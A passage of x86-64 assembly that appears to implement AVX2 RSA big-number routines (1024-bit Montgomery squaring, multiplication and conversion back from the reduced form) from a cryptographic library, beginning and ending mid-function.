vmovdqu ymm11,YMMWORD[((192-24-128))+r13]
add r10,rax
mov rax,rdx
imul rax,QWORD[((16-128))+r13]
vpaddq ymm3,ymm4,ymm10
vpmuludq ymm14,ymm14,ymm0
vmovdqu ymm10,YMMWORD[((224-24-128))+r13]
imul rdx,QWORD[((24-128))+r13]
add r11,rax
lea rax,[r10*1+r9]
vpaddq ymm4,ymm5,ymm14
vpmuludq ymm11,ymm11,ymm0
vmovdqu ymm14,YMMWORD[((256-24-128))+r13]
mov r10,rax
imul eax,ecx
vpmuludq ymm10,ymm10,ymm0
vpaddq ymm5,ymm6,ymm11
vmovdqu ymm11,YMMWORD[((288-24-128))+r13]
and eax,0x1fffffff
vpaddq ymm6,ymm7,ymm10
vpmuludq ymm14,ymm14,ymm0
add rdx,QWORD[24+rsp]
vpaddq ymm7,ymm8,ymm14
vpmuludq ymm11,ymm11,ymm0
vpaddq ymm8,ymm9,ymm11
vmovq xmm9,r12
mov r12,rdx
dec r14d
jnz NEAR $L$OOP_REDUCE_1024
lea r12,[448+rsp]
vpaddq ymm0,ymm13,ymm9
vpxor ymm9,ymm9,ymm9
vpaddq ymm0,ymm0,YMMWORD[((288-192))+rbx]
vpaddq ymm1,ymm1,YMMWORD[((320-448))+r12]
vpaddq ymm2,ymm2,YMMWORD[((352-448))+r12]
vpaddq ymm3,ymm3,YMMWORD[((384-448))+r12]
vpaddq ymm4,ymm4,YMMWORD[((416-448))+r12]
vpaddq ymm5,ymm5,YMMWORD[((448-448))+r12]
vpaddq ymm6,ymm6,YMMWORD[((480-448))+r12]
vpaddq ymm7,ymm7,YMMWORD[((512-448))+r12]
vpaddq ymm8,ymm8,YMMWORD[((544-448))+r12]
vpsrlq ymm14,ymm0,29
vpand ymm0,ymm0,ymm15
vpsrlq ymm11,ymm1,29
vpand ymm1,ymm1,ymm15
vpsrlq ymm12,ymm2,29
vpermq ymm14,ymm14,0x93
vpand ymm2,ymm2,ymm15
vpsrlq ymm13,ymm3,29
vpermq ymm11,ymm11,0x93
vpand ymm3,ymm3,ymm15
vpermq ymm12,ymm12,0x93
vpblendd ymm10,ymm14,ymm9,3
vpermq ymm13,ymm13,0x93
vpblendd ymm14,ymm11,ymm14,3
vpaddq ymm0,ymm0,ymm10
vpblendd ymm11,ymm12,ymm11,3
vpaddq ymm1,ymm1,ymm14
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm2,ymm2,ymm11
vpblendd ymm13,ymm9,ymm13,3
vpaddq ymm3,ymm3,ymm12
vpaddq ymm4,ymm4,ymm13
vpsrlq ymm14,ymm0,29
vpand ymm0,ymm0,ymm15
vpsrlq ymm11,ymm1,29
vpand ymm1,ymm1,ymm15
vpsrlq ymm12,ymm2,29
vpermq ymm14,ymm14,0x93
vpand ymm2,ymm2,ymm15
vpsrlq ymm13,ymm3,29
vpermq ymm11,ymm11,0x93
vpand ymm3,ymm3,ymm15
vpermq ymm12,ymm12,0x93
vpblendd ymm10,ymm14,ymm9,3
vpermq ymm13,ymm13,0x93
vpblendd ymm14,ymm11,ymm14,3
vpaddq ymm0,ymm0,ymm10
vpblendd ymm11,ymm12,ymm11,3
vpaddq ymm1,ymm1,ymm14
vmovdqu YMMWORD[(0-128)+rdi],ymm0
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm2,ymm2,ymm11
vmovdqu YMMWORD[(32-128)+rdi],ymm1
vpblendd ymm13,ymm9,ymm13,3
vpaddq ymm3,ymm3,ymm12
vmovdqu YMMWORD[(64-128)+rdi],ymm2
vpaddq ymm4,ymm4,ymm13
vmovdqu YMMWORD[(96-128)+rdi],ymm3
vpsrlq ymm14,ymm4,29
vpand ymm4,ymm4,ymm15
vpsrlq ymm11,ymm5,29
vpand ymm5,ymm5,ymm15
vpsrlq ymm12,ymm6,29
vpermq ymm14,ymm14,0x93
vpand ymm6,ymm6,ymm15
vpsrlq ymm13,ymm7,29
vpermq ymm11,ymm11,0x93
vpand ymm7,ymm7,ymm15
vpsrlq ymm0,ymm8,29
vpermq ymm12,ymm12,0x93
vpand ymm8,ymm8,ymm15
vpermq ymm13,ymm13,0x93
vpblendd ymm10,ymm14,ymm9,3
vpermq ymm0,ymm0,0x93
vpblendd ymm14,ymm11,ymm14,3
vpaddq ymm4,ymm4,ymm10
vpblendd ymm11,ymm12,ymm11,3
vpaddq ymm5,ymm5,ymm14
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm6,ymm6,ymm11
vpblendd ymm13,ymm0,ymm13,3
vpaddq ymm7,ymm7,ymm12
vpaddq ymm8,ymm8,ymm13
vpsrlq ymm14,ymm4,29
vpand ymm4,ymm4,ymm15
vpsrlq ymm11,ymm5,29
vpand ymm5,ymm5,ymm15
vpsrlq ymm12,ymm6,29
vpermq ymm14,ymm14,0x93
vpand ymm6,ymm6,ymm15
vpsrlq ymm13,ymm7,29
vpermq ymm11,ymm11,0x93
vpand ymm7,ymm7,ymm15
vpsrlq ymm0,ymm8,29
vpermq ymm12,ymm12,0x93
vpand ymm8,ymm8,ymm15
vpermq ymm13,ymm13,0x93
vpblendd ymm10,ymm14,ymm9,3
vpermq ymm0,ymm0,0x93
vpblendd ymm14,ymm11,ymm14,3
vpaddq ymm4,ymm4,ymm10
vpblendd ymm11,ymm12,ymm11,3
vpaddq ymm5,ymm5,ymm14
vmovdqu YMMWORD[(128-128)+rdi],ymm4
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm6,ymm6,ymm11
vmovdqu YMMWORD[(160-128)+rdi],ymm5
vpblendd ymm13,ymm0,ymm13,3
vpaddq ymm7,ymm7,ymm12
vmovdqu YMMWORD[(192-128)+rdi],ymm6
vpaddq ymm8,ymm8,ymm13
vmovdqu YMMWORD[(224-128)+rdi],ymm7
vmovdqu YMMWORD[(256-128)+rdi],ymm8
mov rsi,rdi
dec r8d
jne NEAR $L$OOP_GRANDE_SQR_1024
vzeroall
mov rax,rbp
$L$sqr_1024_in_tail:
movaps xmm6,XMMWORD[((-216))+rax]
movaps xmm7,XMMWORD[((-200))+rax]
movaps xmm8,XMMWORD[((-184))+rax]
movaps xmm9,XMMWORD[((-168))+rax]
movaps xmm10,XMMWORD[((-152))+rax]
movaps xmm11,XMMWORD[((-136))+rax]
movaps xmm12,XMMWORD[((-120))+rax]
movaps xmm13,XMMWORD[((-104))+rax]
movaps xmm14,XMMWORD[((-88))+rax]
movaps xmm15,XMMWORD[((-72))+rax]
mov r15,QWORD[((-48))+rax]
mov r14,QWORD[((-40))+rax]
mov r13,QWORD[((-32))+rax]
mov r12,QWORD[((-24))+rax]
mov rbp,QWORD[((-16))+rax]
mov rbx,QWORD[((-8))+rax]
lea rsp,[rax]
$L$sqr_1024_epilogue:
mov rdi,QWORD[8+rsp] ;WIN64 epilogue
mov rsi,QWORD[16+rsp]
DB 0F3h,0C3h ;repret
$L$SEH_end_rsaz_1024_sqr_avx2:
global rsaz_1024_mul_avx2
ALIGN 64
rsaz_1024_mul_avx2:
mov QWORD[8+rsp],rdi ;WIN64 prologue
mov QWORD[16+rsp],rsi
mov rax,rsp
$L$SEH_begin_rsaz_1024_mul_avx2:
mov rdi,rcx
mov rsi,rdx
mov rdx,r8
mov rcx,r9
mov r8,QWORD[40+rsp]
lea rax,[rsp]
push rbx
push rbp
push r12
push r13
push r14
push r15
vzeroupper
lea rsp,[((-168))+rsp]
vmovaps XMMWORD[(-216)+rax],xmm6
vmovaps XMMWORD[(-200)+rax],xmm7
vmovaps XMMWORD[(-184)+rax],xmm8
vmovaps XMMWORD[(-168)+rax],xmm9
vmovaps XMMWORD[(-152)+rax],xmm10
vmovaps XMMWORD[(-136)+rax],xmm11
vmovaps XMMWORD[(-120)+rax],xmm12
vmovaps XMMWORD[(-104)+rax],xmm13
vmovaps XMMWORD[(-88)+rax],xmm14
vmovaps XMMWORD[(-72)+rax],xmm15
$L$mul_1024_body:
mov rbp,rax
vzeroall
mov r13,rdx
sub rsp,64
DB 0x67,0x67
mov r15,rsi
and r15,4095
add r15,32*10
shr r15,12
mov r15,rsi
cmovnz rsi,r13
cmovnz r13,r15
mov r15,rcx
sub rsi,-128
sub rcx,-128
sub rdi,-128
and r15,4095
add r15,32*10
DB 0x67,0x67
shr r15,12
jz NEAR $L$mul_1024_no_n_copy
sub rsp,32*10
vmovdqu ymm0,YMMWORD[((0-128))+rcx]
and rsp,-512
vmovdqu ymm1,YMMWORD[((32-128))+rcx]
vmovdqu ymm2,YMMWORD[((64-128))+rcx]
vmovdqu ymm3,YMMWORD[((96-128))+rcx]
vmovdqu ymm4,YMMWORD[((128-128))+rcx]
vmovdqu ymm5,YMMWORD[((160-128))+rcx]
vmovdqu ymm6,YMMWORD[((192-128))+rcx]
vmovdqu ymm7,YMMWORD[((224-128))+rcx]
vmovdqu ymm8,YMMWORD[((256-128))+rcx]
lea rcx,[((64+128))+rsp]
vmovdqu YMMWORD[(0-128)+rcx],ymm0
vpxor ymm0,ymm0,ymm0
vmovdqu YMMWORD[(32-128)+rcx],ymm1
vpxor ymm1,ymm1,ymm1
vmovdqu YMMWORD[(64-128)+rcx],ymm2
vpxor ymm2,ymm2,ymm2
vmovdqu YMMWORD[(96-128)+rcx],ymm3
vpxor ymm3,ymm3,ymm3
vmovdqu YMMWORD[(128-128)+rcx],ymm4
vpxor ymm4,ymm4,ymm4
vmovdqu YMMWORD[(160-128)+rcx],ymm5
vpxor ymm5,ymm5,ymm5
vmovdqu YMMWORD[(192-128)+rcx],ymm6
vpxor ymm6,ymm6,ymm6
vmovdqu YMMWORD[(224-128)+rcx],ymm7
vpxor ymm7,ymm7,ymm7
vmovdqu YMMWORD[(256-128)+rcx],ymm8
vmovdqa ymm8,ymm0
vmovdqu YMMWORD[(288-128)+rcx],ymm9
$L$mul_1024_no_n_copy:
and rsp,-64
mov rbx,QWORD[r13]
vpbroadcastq ymm10,QWORD[r13]
vmovdqu YMMWORD[rsp],ymm0
xor r9,r9
DB 0x67
xor r10,r10
xor r11,r11
xor r12,r12
vmovdqu ymm15,YMMWORD[$L$and_mask]
mov r14d,9
vmovdqu YMMWORD[(288-128)+rdi],ymm9
jmp NEAR $L$oop_mul_1024
ALIGN 32
$L$oop_mul_1024:
vpsrlq ymm9,ymm3,29
mov rax,rbx
imul rax,QWORD[((-128))+rsi]
add rax,r9
mov r10,rbx
imul r10,QWORD[((8-128))+rsi]
add r10,QWORD[8+rsp]
mov r9,rax
imul eax,r8d
and eax,0x1fffffff
mov r11,rbx
imul r11,QWORD[((16-128))+rsi]
add r11,QWORD[16+rsp]
mov r12,rbx
imul r12,QWORD[((24-128))+rsi]
add r12,QWORD[24+rsp]
vpmuludq ymm0,ymm10,YMMWORD[((32-128))+rsi]
vmovd xmm11,eax
vpaddq ymm1,ymm1,ymm0
vpmuludq ymm12,ymm10,YMMWORD[((64-128))+rsi]
vpbroadcastq ymm11,xmm11
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm13,ymm10,YMMWORD[((96-128))+rsi]
vpand ymm3,ymm3,ymm15
vpaddq ymm3,ymm3,ymm13
vpmuludq ymm0,ymm10,YMMWORD[((128-128))+rsi]
vpaddq ymm4,ymm4,ymm0
vpmuludq ymm12,ymm10,YMMWORD[((160-128))+rsi]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm13,ymm10,YMMWORD[((192-128))+rsi]
vpaddq ymm6,ymm6,ymm13
vpmuludq ymm0,ymm10,YMMWORD[((224-128))+rsi]
vpermq ymm9,ymm9,0x93
vpaddq ymm7,ymm7,ymm0
vpmuludq ymm12,ymm10,YMMWORD[((256-128))+rsi]
vpbroadcastq ymm10,QWORD[8+r13]
vpaddq ymm8,ymm8,ymm12
mov rdx,rax
imul rax,QWORD[((-128))+rcx]
add r9,rax
mov rax,rdx
imul rax,QWORD[((8-128))+rcx]
add r10,rax
mov rax,rdx
imul rax,QWORD[((16-128))+rcx]
add r11,rax
shr r9,29
imul rdx,QWORD[((24-128))+rcx]
add r12,rdx
add r10,r9
vpmuludq ymm13,ymm11,YMMWORD[((32-128))+rcx]
vmovq rbx,xmm10
vpaddq ymm1,ymm1,ymm13
vpmuludq ymm0,ymm11,YMMWORD[((64-128))+rcx]
vpaddq ymm2,ymm2,ymm0
vpmuludq ymm12,ymm11,YMMWORD[((96-128))+rcx]
vpaddq ymm3,ymm3,ymm12
vpmuludq ymm13,ymm11,YMMWORD[((128-128))+rcx]
vpaddq ymm4,ymm4,ymm13
vpmuludq ymm0,ymm11,YMMWORD[((160-128))+rcx]
vpaddq ymm5,ymm5,ymm0
vpmuludq ymm12,ymm11,YMMWORD[((192-128))+rcx]
vpaddq ymm6,ymm6,ymm12
vpmuludq ymm13,ymm11,YMMWORD[((224-128))+rcx]
vpblendd ymm12,ymm9,ymm14,3
vpaddq ymm7,ymm7,ymm13
vpmuludq ymm0,ymm11,YMMWORD[((256-128))+rcx]
vpaddq ymm3,ymm3,ymm12
vpaddq ymm8,ymm8,ymm0
mov rax,rbx
imul rax,QWORD[((-128))+rsi]
add r10,rax
vmovdqu ymm12,YMMWORD[((-8+32-128))+rsi]
mov rax,rbx
imul rax,QWORD[((8-128))+rsi]
add r11,rax
vmovdqu ymm13,YMMWORD[((-8+64-128))+rsi]
mov rax,r10
vpblendd ymm9,ymm9,ymm14,0xfc
imul eax,r8d
vpaddq ymm4,ymm4,ymm9
and eax,0x1fffffff
imul rbx,QWORD[((16-128))+rsi]
add r12,rbx
vpmuludq ymm12,ymm12,ymm10
vmovd xmm11,eax
vmovdqu ymm0,YMMWORD[((-8+96-128))+rsi]
vpaddq ymm1,ymm1,ymm12
vpmuludq ymm13,ymm13,ymm10
vpbroadcastq ymm11,xmm11
vmovdqu ymm12,YMMWORD[((-8+128-128))+rsi]
vpaddq ymm2,ymm2,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-8+160-128))+rsi]
vpaddq ymm3,ymm3,ymm0
vpmuludq ymm12,ymm12,ymm10
vmovdqu ymm0,YMMWORD[((-8+192-128))+rsi]
vpaddq ymm4,ymm4,ymm12
vpmuludq ymm13,ymm13,ymm10
vmovdqu ymm12,YMMWORD[((-8+224-128))+rsi]
vpaddq ymm5,ymm5,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-8+256-128))+rsi]
vpaddq ymm6,ymm6,ymm0
vpmuludq ymm12,ymm12,ymm10
vmovdqu ymm9,YMMWORD[((-8+288-128))+rsi]
vpaddq ymm7,ymm7,ymm12
vpmuludq ymm13,ymm13,ymm10
vpaddq ymm8,ymm8,ymm13
vpmuludq ymm9,ymm9,ymm10
vpbroadcastq ymm10,QWORD[16+r13]
mov rdx,rax
imul rax,QWORD[((-128))+rcx]
add r10,rax
vmovdqu ymm0,YMMWORD[((-8+32-128))+rcx]
mov rax,rdx
imul rax,QWORD[((8-128))+rcx]
add r11,rax
vmovdqu ymm12,YMMWORD[((-8+64-128))+rcx]
shr r10,29
imul rdx,QWORD[((16-128))+rcx]
add r12,rdx
add r11,r10
vpmuludq ymm0,ymm0,ymm11
vmovq rbx,xmm10
vmovdqu ymm13,YMMWORD[((-8+96-128))+rcx]
vpaddq ymm1,ymm1,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-8+128-128))+rcx]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-8+160-128))+rcx]
vpaddq ymm3,ymm3,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-8+192-128))+rcx]
vpaddq ymm4,ymm4,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-8+224-128))+rcx]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-8+256-128))+rcx]
vpaddq ymm6,ymm6,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-8+288-128))+rcx]
vpaddq ymm7,ymm7,ymm0
vpmuludq ymm12,ymm12,ymm11
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm13,ymm13,ymm11
vpaddq ymm9,ymm9,ymm13
vmovdqu ymm0,YMMWORD[((-16+32-128))+rsi]
mov rax,rbx
imul rax,QWORD[((-128))+rsi]
add rax,r11
vmovdqu ymm12,YMMWORD[((-16+64-128))+rsi]
mov r11,rax
imul eax,r8d
and eax,0x1fffffff
imul rbx,QWORD[((8-128))+rsi]
add r12,rbx
vpmuludq ymm0,ymm0,ymm10
vmovd xmm11,eax
vmovdqu ymm13,YMMWORD[((-16+96-128))+rsi]
vpaddq ymm1,ymm1,ymm0
vpmuludq ymm12,ymm12,ymm10
vpbroadcastq ymm11,xmm11
vmovdqu ymm0,YMMWORD[((-16+128-128))+rsi]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm13,ymm13,ymm10
vmovdqu ymm12,YMMWORD[((-16+160-128))+rsi]
vpaddq ymm3,ymm3,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-16+192-128))+rsi]
vpaddq ymm4,ymm4,ymm0
vpmuludq ymm12,ymm12,ymm10
vmovdqu ymm0,YMMWORD[((-16+224-128))+rsi]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm13,ymm13,ymm10
vmovdqu ymm12,YMMWORD[((-16+256-128))+rsi]
vpaddq ymm6,ymm6,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-16+288-128))+rsi]
vpaddq ymm7,ymm7,ymm0
vpmuludq ymm12,ymm12,ymm10
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm13,ymm13,ymm10
vpbroadcastq ymm10,QWORD[24+r13]
vpaddq ymm9,ymm9,ymm13
vmovdqu ymm0,YMMWORD[((-16+32-128))+rcx]
mov rdx,rax
imul rax,QWORD[((-128))+rcx]
add r11,rax
vmovdqu ymm12,YMMWORD[((-16+64-128))+rcx]
imul rdx,QWORD[((8-128))+rcx]
add r12,rdx
shr r11,29
vpmuludq ymm0,ymm0,ymm11
vmovq rbx,xmm10
vmovdqu ymm13,YMMWORD[((-16+96-128))+rcx]
vpaddq ymm1,ymm1,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-16+128-128))+rcx]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-16+160-128))+rcx]
vpaddq ymm3,ymm3,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-16+192-128))+rcx]
vpaddq ymm4,ymm4,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-16+224-128))+rcx]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-16+256-128))+rcx]
vpaddq ymm6,ymm6,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-16+288-128))+rcx]
vpaddq ymm7,ymm7,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-24+32-128))+rsi]
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-24+64-128))+rsi]
vpaddq ymm9,ymm9,ymm13
add r12,r11
imul rbx,QWORD[((-128))+rsi]
add r12,rbx
mov rax,r12
imul eax,r8d
and eax,0x1fffffff
vpmuludq ymm0,ymm0,ymm10
vmovd xmm11,eax
vmovdqu ymm13,YMMWORD[((-24+96-128))+rsi]
vpaddq ymm1,ymm1,ymm0
vpmuludq ymm12,ymm12,ymm10
vpbroadcastq ymm11,xmm11
vmovdqu ymm0,YMMWORD[((-24+128-128))+rsi]
vpaddq ymm2,ymm2,ymm12
vpmuludq ymm13,ymm13,ymm10
vmovdqu ymm12,YMMWORD[((-24+160-128))+rsi]
vpaddq ymm3,ymm3,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-24+192-128))+rsi]
vpaddq ymm4,ymm4,ymm0
vpmuludq ymm12,ymm12,ymm10
vmovdqu ymm0,YMMWORD[((-24+224-128))+rsi]
vpaddq ymm5,ymm5,ymm12
vpmuludq ymm13,ymm13,ymm10
vmovdqu ymm12,YMMWORD[((-24+256-128))+rsi]
vpaddq ymm6,ymm6,ymm13
vpmuludq ymm0,ymm0,ymm10
vmovdqu ymm13,YMMWORD[((-24+288-128))+rsi]
vpaddq ymm7,ymm7,ymm0
vpmuludq ymm12,ymm12,ymm10
vpaddq ymm8,ymm8,ymm12
vpmuludq ymm13,ymm13,ymm10
vpbroadcastq ymm10,QWORD[32+r13]
vpaddq ymm9,ymm9,ymm13
add r13,32
vmovdqu ymm0,YMMWORD[((-24+32-128))+rcx]
imul rax,QWORD[((-128))+rcx]
add r12,rax
shr r12,29
vmovdqu ymm12,YMMWORD[((-24+64-128))+rcx]
vpmuludq ymm0,ymm0,ymm11
vmovq rbx,xmm10
vmovdqu ymm13,YMMWORD[((-24+96-128))+rcx]
vpaddq ymm0,ymm1,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu YMMWORD[rsp],ymm0
vpaddq ymm1,ymm2,ymm12
vmovdqu ymm0,YMMWORD[((-24+128-128))+rcx]
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-24+160-128))+rcx]
vpaddq ymm2,ymm3,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-24+192-128))+rcx]
vpaddq ymm3,ymm4,ymm0
vpmuludq ymm12,ymm12,ymm11
vmovdqu ymm0,YMMWORD[((-24+224-128))+rcx]
vpaddq ymm4,ymm5,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovdqu ymm12,YMMWORD[((-24+256-128))+rcx]
vpaddq ymm5,ymm6,ymm13
vpmuludq ymm0,ymm0,ymm11
vmovdqu ymm13,YMMWORD[((-24+288-128))+rcx]
mov r9,r12
vpaddq ymm6,ymm7,ymm0
vpmuludq ymm12,ymm12,ymm11
add r9,QWORD[rsp]
vpaddq ymm7,ymm8,ymm12
vpmuludq ymm13,ymm13,ymm11
vmovq xmm12,r12
vpaddq ymm8,ymm9,ymm13
dec r14d
jnz NEAR $L$oop_mul_1024
vpaddq ymm0,ymm12,YMMWORD[rsp]
vpsrlq ymm12,ymm0,29
vpand ymm0,ymm0,ymm15
vpsrlq ymm13,ymm1,29
vpand ymm1,ymm1,ymm15
vpsrlq ymm10,ymm2,29
vpermq ymm12,ymm12,0x93
vpand ymm2,ymm2,ymm15
vpsrlq ymm11,ymm3,29
vpermq ymm13,ymm13,0x93
vpand ymm3,ymm3,ymm15
vpblendd ymm9,ymm12,ymm14,3
vpermq ymm10,ymm10,0x93
vpblendd ymm12,ymm13,ymm12,3
vpermq ymm11,ymm11,0x93
vpaddq ymm0,ymm0,ymm9
vpblendd ymm13,ymm10,ymm13,3
vpaddq ymm1,ymm1,ymm12
vpblendd ymm10,ymm11,ymm10,3
vpaddq ymm2,ymm2,ymm13
vpblendd ymm11,ymm14,ymm11,3
vpaddq ymm3,ymm3,ymm10
vpaddq ymm4,ymm4,ymm11
vpsrlq ymm12,ymm0,29
vpand ymm0,ymm0,ymm15
vpsrlq ymm13,ymm1,29
vpand ymm1,ymm1,ymm15
vpsrlq ymm10,ymm2,29
vpermq ymm12,ymm12,0x93
vpand ymm2,ymm2,ymm15
vpsrlq ymm11,ymm3,29
vpermq ymm13,ymm13,0x93
vpand ymm3,ymm3,ymm15
vpermq ymm10,ymm10,0x93
vpblendd ymm9,ymm12,ymm14,3
vpermq ymm11,ymm11,0x93
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm0,ymm0,ymm9
vpblendd ymm13,ymm10,ymm13,3
vpaddq ymm1,ymm1,ymm12
vpblendd ymm10,ymm11,ymm10,3
vpaddq ymm2,ymm2,ymm13
vpblendd ymm11,ymm14,ymm11,3
vpaddq ymm3,ymm3,ymm10
vpaddq ymm4,ymm4,ymm11
vmovdqu YMMWORD[(0-128)+rdi],ymm0
vmovdqu YMMWORD[(32-128)+rdi],ymm1
vmovdqu YMMWORD[(64-128)+rdi],ymm2
vmovdqu YMMWORD[(96-128)+rdi],ymm3
vpsrlq ymm12,ymm4,29
vpand ymm4,ymm4,ymm15
vpsrlq ymm13,ymm5,29
vpand ymm5,ymm5,ymm15
vpsrlq ymm10,ymm6,29
vpermq ymm12,ymm12,0x93
vpand ymm6,ymm6,ymm15
vpsrlq ymm11,ymm7,29
vpermq ymm13,ymm13,0x93
vpand ymm7,ymm7,ymm15
vpsrlq ymm0,ymm8,29
vpermq ymm10,ymm10,0x93
vpand ymm8,ymm8,ymm15
vpermq ymm11,ymm11,0x93
vpblendd ymm9,ymm12,ymm14,3
vpermq ymm0,ymm0,0x93
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm4,ymm4,ymm9
vpblendd ymm13,ymm10,ymm13,3
vpaddq ymm5,ymm5,ymm12
vpblendd ymm10,ymm11,ymm10,3
vpaddq ymm6,ymm6,ymm13
vpblendd ymm11,ymm0,ymm11,3
vpaddq ymm7,ymm7,ymm10
vpaddq ymm8,ymm8,ymm11
vpsrlq ymm12,ymm4,29
vpand ymm4,ymm4,ymm15
vpsrlq ymm13,ymm5,29
vpand ymm5,ymm5,ymm15
vpsrlq ymm10,ymm6,29
vpermq ymm12,ymm12,0x93
vpand ymm6,ymm6,ymm15
vpsrlq ymm11,ymm7,29
vpermq ymm13,ymm13,0x93
vpand ymm7,ymm7,ymm15
vpsrlq ymm0,ymm8,29
vpermq ymm10,ymm10,0x93
vpand ymm8,ymm8,ymm15
vpermq ymm11,ymm11,0x93
vpblendd ymm9,ymm12,ymm14,3
vpermq ymm0,ymm0,0x93
vpblendd ymm12,ymm13,ymm12,3
vpaddq ymm4,ymm4,ymm9
vpblendd ymm13,ymm10,ymm13,3
vpaddq ymm5,ymm5,ymm12
vpblendd ymm10,ymm11,ymm10,3
vpaddq ymm6,ymm6,ymm13
vpblendd ymm11,ymm0,ymm11,3
vpaddq ymm7,ymm7,ymm10
vpaddq ymm8,ymm8,ymm11
vmovdqu YMMWORD[(128-128)+rdi],ymm4
vmovdqu YMMWORD[(160-128)+rdi],ymm5
vmovdqu YMMWORD[(192-128)+rdi],ymm6
vmovdqu YMMWORD[(224-128)+rdi],ymm7
vmovdqu YMMWORD[(256-128)+rdi],ymm8
vzeroupper
mov rax,rbp
$L$mul_1024_in_tail:
movaps xmm6,XMMWORD[((-216))+rax]
movaps xmm7,XMMWORD[((-200))+rax]
movaps xmm8,XMMWORD[((-184))+rax]
movaps xmm9,XMMWORD[((-168))+rax]
movaps xmm10,XMMWORD[((-152))+rax]
movaps xmm11,XMMWORD[((-136))+rax]
movaps xmm12,XMMWORD[((-120))+rax]
movaps xmm13,XMMWORD[((-104))+rax]
movaps xmm14,XMMWORD[((-88))+rax]
movaps xmm15,XMMWORD[((-72))+rax]
mov r15,QWORD[((-48))+rax]
mov r14,QWORD[((-40))+rax]
mov r13,QWORD[((-32))+rax]
mov r12,QWORD[((-24))+rax]
mov rbp,QWORD[((-16))+rax]
mov rbx,QWORD[((-8))+rax]
lea rsp,[rax]
$L$mul_1024_epilogue:
mov rdi,QWORD[8+rsp] ;WIN64 epilogue
mov rsi,QWORD[16+rsp]
DB 0F3h,0C3h ;repret
$L$SEH_end_rsaz_1024_mul_avx2:
global rsaz_1024_red2norm_avx2
ALIGN 32
rsaz_1024_red2norm_avx2:
sub rdx,-128
xor rax,rax
mov r8,QWORD[((-128))+rdx]
mov r9,QWORD[((-120))+rdx]
mov r10,QWORD[((-112))+rdx]
shl r8,0
shl r9,29
mov r11,r10
shl r10,58
shr r11,6
add rax,r8
add rax,r9
add rax,r10
adc r11,0
mov QWORD[rcx],rax
mov rax,r11
mov r8,QWORD[((-104))+rdx]
mov r9,QWORD[((-96))+rdx]
shl r8,23
mov r10,r9
shl r9,52
shr r10,12
add rax,r8
add rax,r9
adc r10,0
mov QWORD[8+rcx],rax
mov rax,r10
mov r11,QWORD[((-88))+rdx]
mov r8,QWORD[((-80))+rdx]
shl r11,17
mov r9,r8
shl r8,46
shr r9,18
add rax,r11
add rax,r8
adc r9,0
mov QWORD[16+rcx],rax
mov rax,r9
mov r10,QWORD[((-72))+rdx]
mov r11,QWORD[((-64))+rdx]
shl r10,11
mov r8,r11
shl r11,40
shr r8,24
add rax,r10
add rax,r11
adc r8,0
mov QWORD[24+rcx],rax
mov rax,r8
mov r9,QWORD[((-56))+rdx]
mov r10,QWORD[((-48))+rdx]
mov r11,QWORD[((-40))+rdx]
shl r9,5
shl r10,34
mov r8,r11
shl r11,63
shr r8,1
add rax,r9
add rax,r10
add rax,r11
adc r8,0
mov QWORD[32+rcx],rax
mov rax,r8
mov r9,QWORD[((-32))+rdx]
mov r10,QWORD[((-24))+rdx]
shl r9,28
mov r11,r10
shl r10,57
shr r11,7
add rax,r9
add rax,r10
adc r11,0
mov QWORD[40+rcx],rax
mov rax,r11
mov r8,QWORD[((-16))+rdx]
mov r9,QWORD[((-8))+rdx]
shl r8,22
mov r10,r9
shl r9,51
shr r10,13
add rax,r8
add rax,r9
adc r10,0
mov QWORD[48+rcx],rax
mov rax,r10
mov r11,QWORD[rdx]
mov r8,QWORD[8+rdx]
shl r11,16
mov r9,r8
shl r8,45
shr r9,19
add rax,r11
add rax,r8
adc r9,0
mov QWORD[56+rcx],rax
mov rax,r9
mov r10,QWORD[16+rdx]
mov r11,QWORD[24+rdx]
shl r10,10
mov r8,r11
shl r11,39
shr r8,25
add rax,r10
add rax,r11
adc r8,0
